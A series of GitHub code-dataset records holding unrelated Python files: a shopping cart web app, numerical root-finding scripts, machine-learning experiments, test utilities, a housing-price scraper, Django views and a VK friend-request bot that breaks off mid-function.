DisplayCart(webapp2.RequestHandler):\n \n def get(self):\n user = users.get_current_user()\n user_name = 'false'\n if not user:\n user = self.request.cookies.get('key')\n else:\n user = user.email()\n user_name = user\n cookie_id = self.request.cookies.get('key')\n cart_temp = Cart.query(ancestor=cart_key(cookie_id))\n if cart_temp: # if the user has logged in, then merge the temporary cart with his/her cart\n for book in cart_temp:\n cart = Cart(parent=cart_key(user))\n cart.book_id = book.book_id\n cart.book_genre = book.book_genre\n cart.put()\n book.key.delete() \n cart = Cart.query(ancestor=cart_key(user)) \n \n total = 0\n books = []\n for item in cart: # count the total price\n book = Book.query(ancestor=genre_key(item.book_genre.lower())).filter(Book.id == item.book_id).fetch(1) \n total += book[0].price\n books.extend(book)\n \n template_values = {\n 'cart': books,\n 'total': total,\n 'checkout': self.request.get('checkout'),\n 'user_name': user_name,\n }\n\n template = JINJA_ENVIRONMENT.get_template('cart.html')\n self.response.write(template.render(template_values)) \n\nclass CartOperations(webapp2.RequestHandler):\n \n def post(self):\n \n button_checkout = self.request.get(\"checkout\") # check which button in the
    has been clicked\n button_remove = self.request.get(\"remove\")\n \n if button_checkout: # the checkout button has been clicked\n user = users.get_current_user()\n if user == None:\n url = users.create_login_url('/cart')\n self.redirect(url) \n else:\n user = user.email() \n cart_temp = Cart.query(ancestor=cart_key(user))\n for book in cart_temp:\n book.key.delete()\n self.redirect('/cart?' + urllib.urlencode({'user': user}) + '&' + urllib.urlencode({'checkout': 'true'}))\n \n if button_remove: # the remove button has been clicked on\n book_id = button_remove # the value of the button is the book id\n user = users.get_current_user()\n if not user:\n user = self.request.cookies.get('key')\n else:\n user = user.email()\n cart = Cart.query(ancestor=cart_key(user))\n for book in cart:\n if book.book_id == book_id: # delete the book only once\n book.key.delete()\n break\n self.redirect('/cart?' + urllib.urlencode({'user': user}))\n \n\napp = webapp2.WSGIApplication([\n ('/', MainPage),\n ('/enter', EnterPage),\n ('/add', Enter),\n ('/display', DisplayPage),\n ('/search', Search),\n ('/add-to-cart', AddToCart),\n ('/cart', DisplayCart),\n ('/cart-operations', CartOperations),\n], debug=False)\n","repo_name":"Hongyang-Wang/hongyang-shopping-cart","sub_path":"cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":10060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40526866856","text":"import sys\nimport argparse\nglobal a \nglobal df\ndef fx(n):\n return eval(a.replace('x',str(n)))\n\ndef dfx(n):\n return eval(df.replace('x',str(n))) \n\ndef solve(l,r,n):\n mid=(l+r)/2\n print('lower limit {}, upper limit {}, iteration {}, fx(mid) {}'.format(l,r,n,fx(mid)))\n if(n==0):\n return fx(mid)\n if(fx(mid)<0):\n solve(mid,r,n-1)\n else:\n solve(l,mid,n-1)\n\ndef inputEq():\n global a\n print(\"Enter the equation in one variable (Eg 3*x^2-4*x+5)\")\n a=input()\n a=a.replace('^','**')\n a=a.replace(' ','')\n\ndef inputDfx():\n global df\n print(\"Derivative of fx u just entered (Eg 6*x-4)\")\n df=input()\n df=df.replace('^','**')\n df=df.replace(' ','')\n\ndef newton_bisection():\n inputEq()\n print(\"Enter lower and upper limits (Spaced real no, Eg 6 11)\")\n l,r=map(int,input().split())\n print('Enter number of iteration (Eg 20')\n n=int(input())\n if(fx(l)*fx(r)<0):\n solve(l,r,n)\n else:\n print('Incorrect limits f(l)*f(r) should be <0 ')\n\ndef _newton_method(n,guess):\n if(n==0):\n temp=guess-fx(guess)/dfx(guess)\n print('x{}= {} fx{} = {}'.format(n,temp,n,fx(temp)))\n return guess-fx(guess)/dfx(guess)\n nmm=_newton_method(n-1,guess)\n temp=nmm-fx(nmm)/dfx(nmm)\n print('x{}= {} fx{} = {}'.format(n,temp,n,fx(temp)))\n return nmm-fx(nmm)/dfx(nmm)\ndef newton_method():\n inputEq()\n inputDfx()\n print(\"Enter number of iteration\")\n n=int(input())\n print(\"Enter known x for which f(x)>0\")\n guess=int(input())\n _newton_method(n,guess)\n\nparser = argparse.ArgumentParser(\"numerical_techniques\",formatter_class=argparse.RawTextHelpFormatter)\nparser.add_argument(\"-bis\",\"--bisection_method\", help=\"bisection\", action='store_true')\nparser.add_argument(\"-nm\", \"--newton_method\", help=\"Newton secant method\", action='store_true')\nargs = parser.parse_args()\nif(args.bisection_method):\n newton_bisection()\n exit()\nif(args.newton_method):\n newton_method()\n exit()\n","repo_name":"pallav12/numerical_techniques","sub_path":"nt.py","file_name":"nt.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18741428414","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport sklearn\nfrom sklearn.manifold import TSNE\nimport numpy as np\nfrom PIL import Image\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.patheffects as PathEffects\nimport matplotlib\n\nCLASS_NAMES = [\n 'aeroplane',\n 'bicycle',\n 'bird',\n 'boat',\n 'bottle',\n 'bus',\n 'car',\n 'cat',\n 'chair',\n 'cow',\n 'diningtable',\n 'dog',\n 'horse',\n 'motorbike',\n 'person',\n 'pottedplant',\n 'sheep',\n 'sofa',\n 'train',\n 'tvmonitor',\n]\n\n\n\n\ndef load_pascal(data_dir, split='train'):\n \"\"\"\n Function to read images from PASCAL data folder.\n Args:\n data_dir (str): Path to the VOC2007 directory.\n split (str): train/val/trainval split to use.\n Returns:\n images (np.ndarray): Return a np.float32 array of\n shape (N, H, W, 3), where H, W are 224px each,\n and each image is in RGB format.\n labels (np.ndarray): An array of shape (N, 20) of\n type np.int32, with 0s and 1s; 1s for classes that\n are active in that image.\n weights: (np.ndarray): An array of shape (N, 20) of\n type np.int32, with 0s and 1s; 1s for classes that\n are confidently labeled and 0s for classes that \n are ambiguous.\n \"\"\"\n filename = data_dir+\"/ImageSets/Main/\" + split+\".txt\"\n files = open(filename).read()\n data_splitup = files.split('\\n')[:-1]\n \n N = len(data_splitup)\n\n labels = np.zeros([N, len(CLASS_NAMES)],dtype = np.int32)\n weights = np.zeros([N, len(CLASS_NAMES)], dtype =np.int32)\n for class_number in range(len(CLASS_NAMES)):\n class_files = []\n filename2 = data_dir+\"/ImageSets/Main/\" + CLASS_NAMES[class_number] + \"_\" + split+\".txt\"\n files2 = open(filename2).read()\n data_splitup2 = files2.split('\\n')[:-1]\n\n for file in data_splitup2:\n file = file.split(\" \")\n class_files.append([file[0],file[-1]])\n\n for image_number in range(N):\n if(int(class_files[image_number][1]) != 0):\n weights[image_number, class_number] = 1\n if(int(class_files[image_number][1]) == 1):\n labels[image_number, class_number] = 1\n\n if split == 'trainval':\n images = np.empty([N,256,256,3], dtype = np.float32)\n for i in range(N):\n images[i,:,:,:] = Image.open(data_dir + '/JPEGImages/' + data_splitup[i]+ '.jpg').resize((256,256), Image.BILINEAR)\n else:\n images = np.empty([N, 224, 224, 3], dtype = np.float32)\n for i in range(N):\n images[i,:,:,:] = Image.open(data_dir +'/JPEGImages/'+data_splitup[i]+'.jpg').resize((256,256), Image.BILINEAR).crop((16,16,240,240))\n\n return images, labels, weights\n\n\n\n\n\n\n#==== \n# Reference : https://github.com/oreillymedia/t-SNE-tutorial\ndef scatter(x, colors):\n palette = np.array(sns.hls_palette(20))\n ax.scatter(x[:,0], x[:,1], lw=0, s=40, alpha=0.4, c=palette[colors.astype(np.int)])\n plt.show()\n\n\neval_data, eval_labels,eval_weights = load_pascal('VOCdevkit/VOC2007', split='test')\n\neval_labels = np.random.permutation(eval_labels)[:1000]\nlabels = np.zeros(1000)\ni = 0\nwhile (i < 1000):\n labels[i] = np.average(np.where(eval_labels[i]==1))\n i = i + 1\n\nalex_net = np.load('AlexNet.npy',encoding='bytes')\nalex_net = np.array(alex_net)\nfeatures = np.vstack([x['fc9'].flatten() for x in alex_net])\ntsne_proj =TSNE(n_components=2).fit_transform(features)\nsns.palplot(sns.hls_palette(20))\nscatter(tsne_proj,labels)\n\n","repo_name":"lukaeerens93/VLR","sub_path":"05_tsne.py","file_name":"05_tsne.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12379995371","text":"#!/usr/bin/env python\n\nimport os\nfrom os.path import join\nimport unittest\nfrom tempfile import mkdtemp\n\nfrom scipy.io import savemat\nimport Image\nimport numpy as np\n\nfrom ocupy import loader\n\n\nclass TestLoader(unittest.TestCase):\n\n #Test the interface\n def test_load_from_disk(self):\n # Generate a tmp fake data structure\n img_per_cat = {2:list(range(1,10)), 8:list(range(30,40)), 111:list(range(6,15))}\n path,_ = create_tmp_structure(img_per_cat) \n l = loader.LoadFromDisk(impath = path)\n for cat in list(img_per_cat.keys()):\n for image in img_per_cat[cat]:\n l.get_image(cat,image)\n self.assertTrue(l.test_for_category(cat))\n self.assertTrue(l.test_for_image(cat, image))\n # Test checks for non existing images\n no_img_per_cat = {0:list(range(1,10)), 7:list(range(30,40)), 110:list(range(6,15))}\n for cat in list(no_img_per_cat.keys()):\n for image in no_img_per_cat[cat]:\n self.assertTrue(not l.test_for_category(cat))\n self.assertTrue(not l.test_for_image(cat, image))\n no_img_per_cat = {2:list(range(11,20)), 8:list(range(20,30)), 111:list(range(16,40))}\n for cat in list(no_img_per_cat.keys()):\n for image in no_img_per_cat[cat]:\n self.assertTrue(not l.test_for_image(cat, image)) \n rm_tmp_structure(path)\n \n def test_load_from_disk_scaling(self):\n # Generate a tmp fake data structure\n img_per_cat = {2:list(range(1,10)), 8:list(range(30,40)), 111:list(range(6,15))}\n path,_ = create_tmp_structure(img_per_cat) \n l = loader.LoadFromDisk(impath = path, size = (10,10))\n for cat in list(img_per_cat.keys()):\n for image in img_per_cat[cat]:\n im = l.get_image(cat,image)\n self.assertTrue(im.shape[0] == 10 and im.shape[1] == 10)\n self.assertTrue(l.test_for_category(cat))\n self.assertTrue(l.test_for_image(cat, image))\n rm_tmp_structure(path)\n\n def test_save_to_disk(self):\n path = mkdtemp()\n ftrpath = mkdtemp()\n im_tmp = np.ones((100,100))\n l = loader.SaveToDisk(impath = path,ftrpath = ftrpath, size = (10,10))\n # Generate a tmp fake data structure\n img_per_cat = {2:list(range(1,10)), 8:list(range(30,40)), 111:list(range(6,15))}\n for cat in list(img_per_cat.keys()):\n # Create category dir\n for image in img_per_cat[cat]:\n l.save_image(cat, image, im_tmp)\n for f in ['a', 'b']:\n l.save_feature(cat, image, f, np.ones((10,10))) \n l = loader.LoadFromDisk(impath = path, ftrpath = ftrpath, size = (10,10))\n for cat in list(img_per_cat.keys()):\n for image in img_per_cat[cat]:\n im = l.get_image(cat,image)\n self.assertTrue(im.shape[0] == 10 and im.shape[1] == 10)\n self.assertTrue(l.test_for_category(cat))\n self.assertTrue(l.test_for_image(cat, image))\n self.assertTrue(l.test_for_feature(cat, image, 'a'), True) \n os.system('rm -rf %s' %path)\n os.system('rm -rf %s' %ftrpath)\n\n \n def test_testloader(self):\n img_per_cat = {1: list(range(1,10)), 2: list(range(1,10))}\n l = loader.TestLoader(img_per_cat = img_per_cat, features = ['a', 'b'])\n for cat in range(1,10):\n for img in range(1,100):\n if cat in list(img_per_cat.keys()) and img in img_per_cat[cat]: \n self.assertEqual(l.test_for_category(cat), True)\n self.assertEqual(l.test_for_image(cat, img), True)\n self.assertEqual(l.test_for_feature(cat, img, 'a'), True)\n l.get_image(cat, img)\n l.get_feature(cat, img, 'a')\n l.get_feature(cat, img, 'b')\n self.assertTrue(l.test_for_feature(cat, img, 'a'))\n else:\n self.assertEqual(l.test_for_image(cat, img), False)\n self.assertRaises(IndexError, lambda: l.get_image(cat, img))\n \ndef create_tmp_structure(img_per_cat, features = None):\n im_tmp = Image.fromarray(np.ones((1,1))).convert('RGB') \n path = mkdtemp()\n ftr_path = None\n if features:\n ftr_path = mkdtemp()\n for cat in list(img_per_cat.keys()):\n # Create category dir\n os.mkdir(join(path, str(cat)))\n if features:\n for feature in features:\n os.makedirs(join(ftr_path, str(cat), str(feature))) \n for image in img_per_cat[cat]:\n im_tmp.save(join(path,str(cat),'%i_%i.png'%(cat, image)))\n if features:\n for feature in features:\n savemat(join(ftr_path,str(cat),\n feature, '%i_%i.mat'%(cat, image)),\n {'output':np.ones((1,1))})\n return path, ftr_path\n\ndef rm_tmp_structure(path):\n os.system('rm -rf %s' %path)\n\n \n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"nwilming/ocupy","sub_path":"ocupy/tests/test_loader.py","file_name":"test_loader.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"78"} +{"seq_id":"37601039875","text":"import keras\r\nfrom keras import initializers\r\nfrom keras.models import Sequential, load_model\r\nfrom keras.layers import Dense\r\nfrom collections import deque\r\nimport numpy as np\r\nimport random\r\nimport sys\r\n\r\nclass Agent:\r\n\tdef __init__(self, state_size):\r\n\t\tself.state_size = state_size\r\n\t\tself.memory = deque(maxlen=30000)\r\n\t\tself.discount = 0.95\r\n\t\tself.epsilon = 1.0\r\n\t\tself.epsilon_min = 0.001 \r\n\t\tself.epsilon_end_episode = 2000\r\n\t\tself.epsilon_decay = (self.epsilon - self.epsilon_min) / self.epsilon_end_episode\r\n\r\n\t\tself.batch_size = 512\r\n\t\tself.replay_start = 3000\r\n\t\tself.epochs = 1\r\n\r\n\t\tself.model = self.build_model()\r\n\r\n\tdef build_model(self):\r\n\t\tmodel = keras.Sequential([\r\n\t\t\t\tDense(64, input_dim=self.state_size, activation='relu', kernel_initializer='glorot_uniform'),\r\n\t\t\t\tDense(64, activation='relu', kernel_initializer='glorot_uniform'),\r\n\t\t\t\tDense(32, activation='relu', kernel_initializer='glorot_uniform'),\r\n\t\t\t\tDense(1, activation='linear')\r\n\t\t])\r\n\r\n\t\tmodel.compile(loss='mse', optimizer='adam')\r\n\t\treturn model\r\n\r\n\tdef add_to_memory(self, current_state, next_state, reward, done):\r\n\t\tself.memory.append([current_state, next_state, reward, done])\r\n\r\n\tdef act(self, states):\r\n\t\tmax_value = -sys.maxsize - 1\r\n\t\tbest = None\r\n\r\n\t\tif random.random() <= self.epsilon:\r\n\t\t\treturn random.choice(list(states))\r\n\t\telse:\r\n\t\t\tfor state in states:\r\n\t\t\t\tvalue = self.model.predict(np.reshape(state, [1, self.state_size]))\r\n\t\t\t\tif value > max_value:\r\n\t\t\t\t\tmax_value = value\r\n\t\t\t\t\tbest = state\r\n\t\t\r\n\t\treturn best\r\n\r\n\tdef replay(self):\r\n\t\tif len(self.memory) > self.replay_start:\r\n\t\t\tbatch = random.sample(self.memory, self.batch_size)\r\n\r\n\t\t\tnext_states = np.array([s[1] for s in batch])\r\n\t\t\tnext_qvalue = np.array([s[0] for s in self.model.predict(next_states)])\r\n\r\n\t\t\tx = []\r\n\t\t\ty = []\r\n\r\n\r\n\t\t\tfor i in range(self.batch_size):\r\n\t\t\t\tstate, _, reward, done = batch[i][0], None, batch[i][2], batch[i][3]\r\n\t\t\t\tif not done:\r\n\t\t\t\t\tnew_q = reward + self.discount * next_qvalue[i]\r\n\t\t\t\telse:\r\n\t\t\t\t\tnew_q = reward\r\n\r\n\t\t\t\tx.append(state)\r\n\t\t\t\ty.append(new_q)\r\n\r\n\t\t\tself.model.fit(np.array(x), np.array(y), batch_size=self.batch_size, epochs=self.epochs, verbose=0)\r\n","repo_name":"andreanlay/tetris-ai-deep-reinforcement-learning","sub_path":"src/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"39570534202","text":"\r\n# This function works for show the statistical information.\r\ndef statistics(total_bookings, rows, clms, current_inc):\r\n \r\n # Print total seat bookings\r\n print('Number of purchased tickets:', total_bookings)\r\n \r\n # Calculating total seats\r\n total_seats = rows * clms\r\n print('Percentage:', (total_bookings / total_seats) * 100 )\r\n \r\n # Calculating current income\r\n print('Current income:', current_inc)\r\n \r\n #### Calculating Total income ####\r\n \r\n total_inc = 0\r\n # Finding middle row for cost confirmation.\r\n half_st_posn = int(rows / 2)\r\n\r\n # Logic for find total income \r\n if total_seats > 60:\r\n total_inc = (half_st_posn * clms * 10) + ((rows - half_st_posn) * clms * 8)\r\n else:\r\n total_inc = total_seats * 10\r\n \r\n print('Total income:', total_inc)","repo_name":"ramasureshvijjana/EdYoda","sub_path":"Book_My_Show/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"86738535883","text":"#!/usr/bin/env python3\r\n\r\nimport os\r\nimport cv2\r\nimport argparse\r\nimport pandas as pd\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n # Argument parser\r\n argpars = argparse.ArgumentParser()\r\n argpars.add_argument(\"--img-folder\", required=True, help=\"INFO >> Path to the folder containing the images to label.\")\r\n args = argpars.parse_args()\r\n\r\n # Get list of files in the folder\r\n if not os.path.exists(args.img_folder):\r\n raise RuntimeError(f\"Path {args.img_folder} not exists!\")\r\n\r\n file_list = os.listdir(args.img_folder) # conterrà le foto\r\n file_list.sort()\r\n\r\n # Check if the labels file exists\r\n if os.path.exists(\"../../annotations/annotations.csv\"):\r\n print(\"INFO >> Continuing existing annotation...\")\r\n df = pd.read_csv(f\"group_{args.group_id}.csv\", index_col=False)\r\n\r\n else:\r\n print(\"INFO >> New annotation...\")\r\n data = {\r\n \"file_name\": file_list,\r\n \"smoke\": [-1]*len(file_list),\r\n }\r\n\r\n df = pd.DataFrame(data=data)\r\n \r\n for row in df.iterrows():\r\n if row[1][1] == -1:\r\n try:\r\n img = cv2.imread(os.path.join(args.img_folder, row[1][0]))\r\n cv2.imshow(\"Current frame\", img)\r\n cv2.waitKey(50)\r\n\r\n labels = [-1]\r\n\r\n while labels[0] not in [1, 0]:\r\n try:\r\n labels[0] = int(\r\n input(\"INFO >> Does the frame has smoke inside? (0 = NO, 1 = YES) \"))\r\n except ValueError:\r\n print(\"INFO >> Please insert an integer value!\")\r\n\r\n\r\n df.loc[row[0], [\"smoke\"]] = labels[0]\r\n cv2.destroyAllWindows()\r\n cv2.waitKey(50)\r\n\r\n except KeyboardInterrupt:\r\n break\r\n \r\n df.to_csv(\"../../annotations/annotations.csv\", index=False, header=False)\r\n","repo_name":"alesorr/smoke-detector","sub_path":"source/utils/img_annotation.py","file_name":"img_annotation.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27940168492","text":"import os\n\nimport numpy as np\nimport pandas as pd\nfrom lxml import etree\nfrom openpyxl import load_workbook, Workbook\nimport requests\nimport matplotlib.pyplot as plt\n\nregions = {'dongcheng': 100, 'xicheng': 100, 'chaoyang': 100, 'haidian': 100, 'fengtai': 100, 'shijingshan': 100,\n 'tongzhou': 100, 'changping': 100, 'daxing': 100, 'yizhuangkaifaqu': 48, 'shunyi': 100, 'fangshan': 100,\n 'mentougou': 49, 'pinggu': 3, 'huairou': 1, 'miyun': 3, 'yanqing': 1,\n }\n\n\ndef getPage(region, index):\n url = 'https://bj.lianjia.com/ershoufang/' + str(region) + '/pg' + str(index)\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',\n }\n html = requests.get(url, headers=headers).text\n html = etree.HTML(html)\n main_info = html.xpath('//ul[contains(@class,\"sellListContent\")]/li')\n result = []\n for m in main_info:\n title = m.xpath('div//div[@class=\"title\"]/a/text()')[0]\n houseInfo = m.xpath('div//div[@class=\"houseInfo\"]/text()')[0]\n totalPrice = ''.join(m.xpath('div//div[@class=\"totalPrice\"]//text()'))\n unitPrice = m.xpath('div//div[@class=\"unitPrice\"]//text()')[0]\n address = '-'.join(m.xpath('div//div[@class=\"positionInfo\"]/a/text()'))\n result.append([title, houseInfo, totalPrice, unitPrice, address])\n return result\n\n\ndef getRegionsInfo(region):\n result = []\n for i in range(regions[region]):\n r = getPage(region, i + 1)\n result.extend(r)\n print(region, r)\n # write_excel(region, result)\n return result\n\n\ndef write_excel(region, result):\n path = 'a.xlsx'\n if not os.path.exists(path):\n wb = Workbook()\n wb.save(path)\n wb = load_workbook(path)\n wb.guess_types = True # 猜测格式类型\n mySheet = wb.create_sheet(title=region)\n for r in result:\n mySheet.append(r)\n wb.save(path)\n\n\n# for r in regions:\n# getRegionsInfo(r)\n\ndef read_excel():\n path = 'a.xlsx'\n if not os.path.exists(path):\n return\n wb = load_workbook(path)\n wb.guess_types = True # 猜测格式类型\n return wb\n\n\ndef calculation_avg(wb):\n avg_price = {}\n avg_area = {}\n for reg in regions:\n mySheet = wb[reg]\n price = [int(r.value.replace('单价', '').replace('元/平米', '')) for r in mySheet['D']]\n area = [float(r.value.split('|')[1].replace('平米', '')) for r in mySheet['B']]\n avg_price[reg] = sum(price) / len(price)\n avg_area[reg] = sum(area) / len(area)\n return avg_price, avg_area\n\n\nprice_list, area_list = calculation_avg(read_excel())\n\ndf1 = pd.DataFrame(price_list.values(), columns=['avg_price'], index=list(price_list.keys()))\ndf2 = pd.DataFrame(area_list.values(), columns=['avg_area'], index=list(area_list.keys()))\ndf1.plot.bar()\ndf2.plot.bar()\nplt.show()\n","repo_name":"Crack-DanShiFu/pachong8","sub_path":"lianjia3.py","file_name":"lianjia3.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27347733651","text":"#!/usr/bin/python3\n\nif __name__ == \"__main__\":\n\n from sys import argv\n\n arg = \"argument\"\n length = len(argv)\n summ = 0\n\n for args in range(length):\n if args > 0:\n summ += int(argv[args])\n\n print(\"{}\".format(summ))\n","repo_name":"josephmaxime/alx-higher_level_programming","sub_path":"0x02-python-import_modules/3-infinite_add.py","file_name":"3-infinite_add.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71048758011","text":"from django.shortcuts import render\n\nfrom main.models import Task, Todo\n\n\ndef todo_tasks(request, pk):\n try:\n todo = Todo.objects.get(id=pk)\n tasks = Task.objects.filter(todo=todo, completed=False)\n # date - en_formats.DATE_FORMAT = \"d/m/Y\" - in settings.py\n context = {\"todo\": todo, \"tasks\": tasks, \"completed\": False}\n return render(request, 'todo_list.html', context=context)\n except Todo.DoesNotExist:\n return render(request, '404.html')\n\n\ndef completed_tasks(request, pk):\n try:\n todo = Todo.objects.get(id=pk)\n tasks = Task.objects.filter(todo=todo, completed=True)\n context = {\"todo\": todo, \"tasks\": tasks, \"completed\": True}\n return render(request, 'completed_todo_list.html', context=context)\n except Todo.DoesNotExist:\n return render(request, '404.html')\n","repo_name":"ayananygmetova/BFDjango","sub_path":"lab4/TODO/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4382880849","text":"import sqlite3\n\n\nconn = sqlite3.connect(database='sqlitedb.db')\n\nmycursor=conn.cursor()\ntry:\n # execute : sql 구문을 실행하는 함수\n mycursor.execute(\"drop table sungjuk\")\nexcept sqlite3.OperationalError as err:\n print(\"테이블이 존재하지 않습니다.\")\n\nmycursor.execute('''create table sungjuk\n(id text, subject text , jumsu integer, unique(id,subject))\n''')\n\ndatamylist=[('lee','java',10),('lee','html',20),('lee','python',30),('jo','java',40),\n ('jo','html',50),('jo','pytho ',60),('ko','java',70),('ko','html',80),\n ('ko','python',90)]\n\nsql = \"insert into sungjuk(id, subject, jumsu) values(?,?,?)\"\n\nmycursor.executemany(sql, datamylist)\nconn.commit()","repo_name":"Orderlee/SBA_STUDY","sub_path":"0908/03_spliteEx02.py","file_name":"03_spliteEx02.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38631815656","text":"import numpy as np\r\nimport scipy.io as sio\r\nimport matplotlib.pyplot as plt\r\nbodyfat_data = sio.loadmat('C:\\\\Users\\\\Ric\\\\Desktop\\\\545HW3\\\\bodyfat_data.mat')\r\n\r\nmseList=list()\r\nnp.random.seed(0)\r\nx = bodyfat_data['X']\r\ny = bodyfat_data['y']\r\nn,d= x.shape\r\nytrain=y[:150]\r\nXmatrix=np.asmatrix(np.concatenate((np.ones((n,1)),x),axis=1)[0:150,:])\r\n\r\n\r\nite=0\r\nwhile (True):\r\n if ite==0:\r\n###################Forward Pass###########################\r\n z0=Xmatrix\r\n inputNum=150\r\n w1=np.random.randn(64,3)\r\n w1[:,0]=0\r\n a1=z0.dot(w1.T)\r\n a1[a1<=0]=0\r\n z1=np.asmatrix(np.concatenate((np.ones((inputNum,1)),a1),axis=1))\r\n w2=np.random.randn(16,65)\r\n w2[:,0]=0\r\n a2=z1.dot(w2.T)\r\n a2[a2<=0]=0\r\n z2=np.asmatrix(np.concatenate((np.ones((inputNum,1)),a2),axis=1))\r\n w3=np.random.randn(1,17)\r\n w3[:,0]=0\r\n a3=z2.dot(w3.T)\r\n \r\n \r\n \r\n else:\r\n \r\n z0=Xmatrix\r\n inputNum=150\r\n \r\n a1=z0.dot(w1.T)\r\n a1[a1<=0]=0\r\n z1=np.asmatrix(np.concatenate((np.ones((inputNum,1)),a1),axis=1))\r\n \r\n \r\n a2=z1.dot(w2.T)\r\n a2[a2<=0]=0\r\n z2=np.asmatrix(np.concatenate((np.ones((inputNum,1)),a2),axis=1))\r\n \r\n a3=z2.dot(w3.T)\r\n########################################################################\r\n\r\n#############Loss Metric################################################ \r\n mse = (np.square(a3-ytrain)).mean(axis=0)\r\n print(mse)\r\n print(ite)\r\n mseList.append(np.asscalar(mse))\r\n######################################################################## \r\n \r\n#####################Backward Pass###################################### \r\n delta3=-2*(ytrain-a3)\r\n sigmaPrime2=a2.copy()\r\n \r\n sigmaPrime2[sigmaPrime2>0]=1\r\n delta2=np.multiply(delta3.dot(w3[:,1:]),sigmaPrime2)\r\n for j in range(16):\r\n for i in range(65):\r\n partial=0\r\n for iteN in range(inputNum):\r\n partial=partial+delta2[iteN,j]*z1[iteN,i]\r\n partial=partial/inputNum\r\n w2[j,i]=w2[j,i]-10**(-7)*partial\r\n \r\n sigmaPrime1=a1.copy()\r\n sigmaPrime1[sigmaPrime1>0]=1\r\n \r\n delta1=np.multiply(delta2.dot(w2[:,1:]),sigmaPrime1)\r\n for j in range(64):\r\n for i in range(3):\r\n partial=0\r\n for iteN in range(inputNum):\r\n partial=partial+delta1[iteN,j]*z0[iteN,i]\r\n partial=partial/inputNum\r\n w1[j,i]=w1[j,i]-10**(-7)*partial\r\n######################################################################## \r\n ite=ite+1\r\n if ite>1:\r\n if (abs(mseList[ite-1]-mseList[ite-2])<10**(-4)):\r\n break\r\n\r\nprint(\"Stopping criterion: the absolute value of the change of MSE < 1e-4\")\r\nprint(\"After \"+str(ite)+\" iterations,\"+\"training data MSE: \"+str(mseList[-1]))\r\nplt.title(\"log of MSE vs iterations\")\r\nplt.plot(np.log(mseList))\r\nplt.ylabel(\"log of MSE\")\r\nplt.show()\r\n\r\n# For test data\r\n################################Forward Pass#################################\r\nytest=y[150:]\r\nXMatrixTest=np.asmatrix(np.concatenate((np.ones((n,1)),x),axis=1)[150:,:])\r\n\r\n\r\nz0=XMatrixTest\r\ninputNum=n-150\r\n\r\n\r\na1=z0.dot(w1.T)\r\na1[a1<=0]=0\r\nz1=np.asmatrix(np.concatenate((np.ones((inputNum,1)),a1),axis=1))\r\n\r\n\r\na2=z1.dot(w2.T)\r\na2[a2<=0]=0\r\nz2=np.asmatrix(np.concatenate((np.ones((inputNum,1)),a2),axis=1))\r\n\r\na3=z2.dot(w3.T)\r\n############################################################################\r\n\r\n#########################Loss Metric#######################################\r\nmse = (np.square(a3-ytest)).mean(axis=0)\r\n############################################################################\r\nprint(\"Test data MSE: \"+str(np.asscalar(mse)))\r\n","repo_name":"RickYuankangShong-Quantitative-Finance/Quantitative-Finance","sub_path":"neuralNetwork.py","file_name":"neuralNetwork.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36125209034","text":"import logging\r\nimport time\r\nimport typing\r\nfrom threading import Thread\r\n\r\nfrom vkapi import VkApi, VkApiResponseException\r\nfrom ... import utils\r\nfrom ...objects import dp, MySignalEvent, DB\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nafa_thread: Thread = None\r\nstop_thread = False\r\n\r\n\r\ndef set_afa(v):\r\n global stop_thread\r\n global afa_thread\r\n\r\n db = DB()\r\n stop_thread = v\r\n if v == False:\r\n api = VkApi(db.access_token)\r\n afa_thread = Thread(target=afa_th, args=(api, lambda: stop_thread))\r\n afa_thread.setDaemon(True)\r\n afa_thread.setName('AFA Thread')\r\n afa_thread.start()\r\n\r\n\r\ndef afa_th(api: VkApi, stop: typing.Callable):\r\n is_stop = False\r\n while True:\r\n try:\r\n if is_stop: break\r\n logger.info(\"Установлен онлайн\")\r\n\r\n data = api('friends.getRequests', offset=0, count=1000, extended=0, need_mutual=0, out=0, need_viewed=1)[\r\n 'items']\r\n users = api('users.get', user_ids=\",\".join([str(i) for i in data]))\r\n\r\n for user in users:\r\n if user.get('deactivated', None) != None:\r\n continue\r\n try:\r\n api(\"friends.add\", user_id=user['id'])\r\n except VkApiResponseException as e:\r\n logger.error(\r\n f'Ошибка добавления пользвателя в друзья. 